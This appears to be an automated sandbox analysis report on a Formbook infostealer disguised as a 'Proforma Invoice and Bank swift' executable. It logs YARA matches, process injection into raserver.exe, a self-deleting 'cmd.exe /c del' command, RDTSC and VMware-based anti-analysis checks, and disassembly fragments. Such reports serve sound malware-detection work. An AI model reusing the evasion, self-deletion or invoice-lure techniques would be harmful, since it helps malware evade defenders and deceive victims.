Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/4@11/8

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Code function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404356

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Code function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,

0_2_00402020

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_01

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

File created: C:\Users\user\AppData\Local\Temp\nsv24C7.tmp

Jump to behavior

Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Virustotal: Detection: 29%
Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe	ReversingLabs: Detection: 29%

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

File read: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Process created: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Process created: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'	Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.695638149.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000000.00000003.650872254.0000000009990000.00000004.00000001.sdmp, Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000002.00000002.704631628.0000000000BDF000.00000040.00000001.sdmp, raserver.exe, 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, raserver.exe
Source:	Binary string: RAServer.pdb source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000002.00000002.704478667.0000000000940000.00000040.00000001.sdmp
Source:	Binary string: RAServer.pdbGCTL source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000002.00000002.704478667.0000000000940000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.695638149.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Unpacked PE file: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405E88

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 0_2_6F732F60 push eax; ret	0_2_6F732F8E
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00416026 push ebx; iretd	2_2_00416027
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_0041C087 push dword ptr [DF0C81F8h]; ret	2_2_0041C1C4
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00409A94 push 00D6BDC6h; iretd	2_2_00409A99
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_0041B3B5 push eax; ret	2_2_0041B408
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_0041B46C push eax; ret	2_2_0041B472
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_0041B402 push eax; ret	2_2_0041B408
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_0041B40B push eax; ret	2_2_0041B472
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B3D0D1 push ecx; ret	2_2_00B3D0E4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D0D0D1 push ecx; ret	7_2_04D0D0E4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00ACC087 push dword ptr [DF0C81F8h]; ret	7_2_00ACC1C4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00AC6026 push ebx; iretd	7_2_00AC6027
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00AB9A94 push 00D6BDC6h; iretd	7_2_00AB9A99
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00ACB3B5 push eax; ret	7_2_00ACB408
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00ACB40B push eax; ret	7_2_00ACB472
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00ACB402 push eax; ret	7_2_00ACB408
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00ACB46C push eax; ret	7_2_00ACB472

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

File created: C:\Users\user\AppData\Local\Temp\nsp24F7.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 0000000000AB85E4 second address: 0000000000AB85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 0000000000AB897E second address: 0000000000AB8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Code function: 2_2_004088B0 rdtsc

2_2_004088B0

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	API coverage: 6.5 %
Source: C:\Windows\SysWOW64\raserver.exe	API coverage: 7.1 %

Source: C:\Windows\explorer.exe TID: 5752	Thread sleep time: -55000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe TID: 7124	Thread sleep time: -44000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\raserver.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\raserver.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 0_2_00405E61 FindFirstFileA,FindClose,	0_2_00405E61
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_0040548B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 0_2_0040263E FindFirstFileA,	0_2_0040263E

Source: explorer.exe, 00000005.00000000.695476860.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.673631126.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.670610896.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.673631126.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.692663618.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.695476860.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.673760254.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.695476860.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000005.00000000.673812206.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000005.00000000.695476860.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	API call chain: ExitProcess graph end node			graph_0-4370
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	API call chain: ExitProcess graph end node			graph_0-4369

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Code function: 2_2_004088B0 rdtsc

2_2_004088B0

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Code function: 2_2_00409B20 LdrLoadDll,

2_2_00409B20

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405E88

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1F0BF mov ecx, dword ptr fs:[00000030h]	2_2_00B1F0BF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1F0BF mov eax, dword ptr fs:[00000030h]	2_2_00B1F0BF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1F0BF mov eax, dword ptr fs:[00000030h]	2_2_00B1F0BF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B120A0 mov eax, dword ptr fs:[00000030h]	2_2_00B120A0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B120A0 mov eax, dword ptr fs:[00000030h]	2_2_00B120A0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B120A0 mov eax, dword ptr fs:[00000030h]	2_2_00B120A0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B120A0 mov eax, dword ptr fs:[00000030h]	2_2_00B120A0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B120A0 mov eax, dword ptr fs:[00000030h]	2_2_00B120A0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B120A0 mov eax, dword ptr fs:[00000030h]	2_2_00B120A0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B290AF mov eax, dword ptr fs:[00000030h]	2_2_00B290AF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE9080 mov eax, dword ptr fs:[00000030h]	2_2_00AE9080
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B63884 mov eax, dword ptr fs:[00000030h]	2_2_00B63884
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B63884 mov eax, dword ptr fs:[00000030h]	2_2_00B63884
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE58EC mov eax, dword ptr fs:[00000030h]	2_2_00AE58EC
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE40E1 mov eax, dword ptr fs:[00000030h]	2_2_00AE40E1
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE40E1 mov eax, dword ptr fs:[00000030h]	2_2_00AE40E1
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE40E1 mov eax, dword ptr fs:[00000030h]	2_2_00AE40E1
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B8E4 mov eax, dword ptr fs:[00000030h]	2_2_00B0B8E4
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B8E4 mov eax, dword ptr fs:[00000030h]	2_2_00B0B8E4
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B7B8D0 mov eax, dword ptr fs:[00000030h]	2_2_00B7B8D0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B7B8D0 mov ecx, dword ptr fs:[00000030h]	2_2_00B7B8D0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B7B8D0 mov eax, dword ptr fs:[00000030h]	2_2_00B7B8D0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B7B8D0 mov eax, dword ptr fs:[00000030h]	2_2_00B7B8D0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B7B8D0 mov eax, dword ptr fs:[00000030h]	2_2_00B7B8D0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B7B8D0 mov eax, dword ptr fs:[00000030h]	2_2_00B7B8D0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A830 mov eax, dword ptr fs:[00000030h]	2_2_00B0A830
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A830 mov eax, dword ptr fs:[00000030h]	2_2_00B0A830
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A830 mov eax, dword ptr fs:[00000030h]	2_2_00B0A830
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A830 mov eax, dword ptr fs:[00000030h]	2_2_00B0A830
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AFB02A mov eax, dword ptr fs:[00000030h]	2_2_00AFB02A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AFB02A mov eax, dword ptr fs:[00000030h]	2_2_00AFB02A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AFB02A mov eax, dword ptr fs:[00000030h]	2_2_00AFB02A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AFB02A mov eax, dword ptr fs:[00000030h]	2_2_00AFB02A
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1002D mov eax, dword ptr fs:[00000030h]	2_2_00B1002D
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1002D mov eax, dword ptr fs:[00000030h]	2_2_00B1002D
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1002D mov eax, dword ptr fs:[00000030h]	2_2_00B1002D
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1002D mov eax, dword ptr fs:[00000030h]	2_2_00B1002D
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1002D mov eax, dword ptr fs:[00000030h]	2_2_00B1002D
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B67016 mov eax, dword ptr fs:[00000030h]	2_2_00B67016
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B67016 mov eax, dword ptr fs:[00000030h]	2_2_00B67016
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B67016 mov eax, dword ptr fs:[00000030h]	2_2_00B67016
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB4015 mov eax, dword ptr fs:[00000030h]	2_2_00BB4015
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB4015 mov eax, dword ptr fs:[00000030h]	2_2_00BB4015
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA2073 mov eax, dword ptr fs:[00000030h]	2_2_00BA2073
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB1074 mov eax, dword ptr fs:[00000030h]	2_2_00BB1074
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B00050 mov eax, dword ptr fs:[00000030h]	2_2_00B00050
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B00050 mov eax, dword ptr fs:[00000030h]	2_2_00B00050
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B651BE mov eax, dword ptr fs:[00000030h]	2_2_00B651BE
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B651BE mov eax, dword ptr fs:[00000030h]	2_2_00B651BE
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B651BE mov eax, dword ptr fs:[00000030h]	2_2_00B651BE
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B651BE mov eax, dword ptr fs:[00000030h]	2_2_00B651BE
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B099BF mov ecx, dword ptr fs:[00000030h]	2_2_00B099BF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B099BF mov ecx, dword ptr fs:[00000030h]	2_2_00B099BF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B099BF mov eax, dword ptr fs:[00000030h]	2_2_00B099BF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B099BF mov ecx, dword ptr fs:[00000030h]	2_2_00B099BF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B099BF mov ecx, dword ptr fs:[00000030h]	2_2_00B099BF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B099BF mov eax, dword ptr fs:[00000030h]	2_2_00B099BF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B099BF mov ecx, dword ptr fs:[00000030h]	2_2_00B099BF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B099BF mov ecx, dword ptr fs:[00000030h]	2_2_00B099BF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B099BF mov eax, dword ptr fs:[00000030h]	2_2_00B099BF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B099BF mov ecx, dword ptr fs:[00000030h]	2_2_00B099BF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B099BF mov ecx, dword ptr fs:[00000030h]	2_2_00B099BF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B099BF mov eax, dword ptr fs:[00000030h]	2_2_00B099BF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B669A6 mov eax, dword ptr fs:[00000030h]	2_2_00B669A6
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B161A0 mov eax, dword ptr fs:[00000030h]	2_2_00B161A0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B161A0 mov eax, dword ptr fs:[00000030h]	2_2_00B161A0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA49A4 mov eax, dword ptr fs:[00000030h]	2_2_00BA49A4
